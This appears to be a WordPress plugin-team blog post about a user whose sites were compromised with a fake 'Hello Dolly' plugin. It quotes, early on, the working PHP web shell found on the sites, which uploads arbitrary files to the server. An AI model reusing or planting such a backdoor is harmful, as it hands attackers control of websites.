Han (not his real name) emailed the plugin team to complain he was suspended by the forums team.
[…]
But sometime in the last 12 months I had several sites attacked in which a Fake version of the Hello Dolly plugin was installed maliciously.
Sadly as my post was deleted without warning or explanation any further details I could have given on the subject where lost along with the post.
Now. Someone did reply to Han and told him that the fake plugin meant he had a vulnerability on his site, and here’s how you can look into that. Since his forum post included a code snippet, yes, it was removed after he was emailed about it.
If it’s not hosted here, we don’t care
That was, more or less, my mantra. It’s wrong, I very much do care, but I cannot do a blessed thing about other people’s sites.
Still, we looked at the thread, and I was amused by the code:
if(isset($_REQUEST['act'])){
echo '<b>'.php_uname().'</b><br>';
echo @file_get_contents('/location/server/version').'<br />';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name'];
} else {
echo '<b>Upload failed!</b>';
}
}
exit;
}
We replied that the code Han found on his server was not hosted on WordPress.org and, therefore, we could do nothing about it, here’s how you clean up your hacked site.
You’re reporting that your sites have a vulnerability and someone is exploiting them. That they happen to use Hello Dolly to hide their malicious code is not something we could prevent. All we can tell you is that something on your sites is insecure and being used as a back door.
Han disagreed:
No the plugin was faking being hello dolly i don’t use it that’s how it was discovered. It installed itself and pretended to be hello dolly so yeah your problem coz it’s pretending to be one of your plugins
That’s not how it works. I get why Han thought that, and in a way, it is a problem but … what can we do about it?
- We don’t know where the hack is from
- The hacker could have faked any plugin
- Of fucking course they’d fake a well known one people might ignore
I’d love to be able to stop people from faking plugins, but there’s no way to even try.
Fix Your Site
We tried again:
I’m sorry but you are incorrect in your understanding.
The problem is not the Fake Hello Dolly, the problem is SOMETHING ELSE on your sites is vulnerable and that is being used by evil people to install the fake plugin.
They could have named the fake plugin anything. They picked Hello Dolly because it’s common, but there’s nothing anyone can do to make them pick another name.
There’s nothing we can do to help you here.
Stop looking at the fake plugin as the source of your trouble and figure out what OTHER plugin or theme LET IT get installed.
Or hire a security company to help you.
Because you see the real issue is his sites keep getting hacked. So y’know, fix yourself.
Or don’t you think it worth warning users to be aware of a threat that is branding itself as a WordPress product?
I’m not asking you to fix anything. Im talking about something I found while patching security on someone else’s site sure they could have named it anything. But the code and everything about it was disguised to look a lot like Hello Dolly. All i wanted was to make someone aware but fine. Thanks I’ll know not to bother trying to help the community next time
I see we’ve jumped over to ‘you won’t do what I want so I won’t ever help again’ — a common refrain.
WordPress.org cannot stop people from being assholes
So we tried again
We understand what you’re trying to do. The reality is that there’s nothing we can do about this.
It’s like people selling a fake Rolex watch. If we knew who it was, we could attempt to stop them. But knowing that it happens ‘somewhere’ out there and that someone fell for it? Well… we’re sorry and it sucks, but there’s nothing we can do about it.
Someone made a fake Hello Dolly and hid bad code in it. They could have picked any plugin, even Yoast SEO, but even then Yoast would tell you there’s nothing they can do either.
Of course Dolly was targeted. It’s on every single install. It’s like targeting Safari on a Mac. Ever Mac has it. It’s there. It’s used. Target it.
All you’ve done here is tell us “Hey someone made a fake plugin and hid stuff in it.”
Thank you, but there’s nothing we can do to stop it, and there’s nothing we can do to help people because the real issue isn’t whose plugin was faked, but how did that get installed in the first place. And that’s the job of a site security team.
Unless the fake plugin is being distributed by WordPress.org, or the vulnerability that allowed it to be installed is in a plugin hosted on WordPress.org, this is outside our purview and we cannot assist you.
At that point, Han accepted the point, but bitched we weren’t super kind at the start.
Now here’s where it gets funny.
Han claimed he never got the emails from the forums team, except he did. We know he did because he quoted one in his first email! So, since we knew he’d already been told things (like the plugin team cannot help you on code hosted outside of WordPress.org), we’d skipped that at the start of his email and that pissed him off.
When this was pointed out, he claimed (again) to have not gotten the emails and didn’t know what to do. So we directed him to Slack and he opted to … not.
Points to Remember?
If a plugin is ‘hacked’ it’s likely a different plugin causing it and you can check because all the code on WordPress.org is open source and free to view. You can go look and say “Hmm. my copy of Hello Dolly doesn’t match!” That means the issue is not with the code hosted on WordPress.org, it’s something else!
If it’s code you bought elsewhere, again, don’t complain to the Plugin Review Team, they can’t do jack.
If it’s code you got from a nulled site, well you’re an idiot and don’t do that again.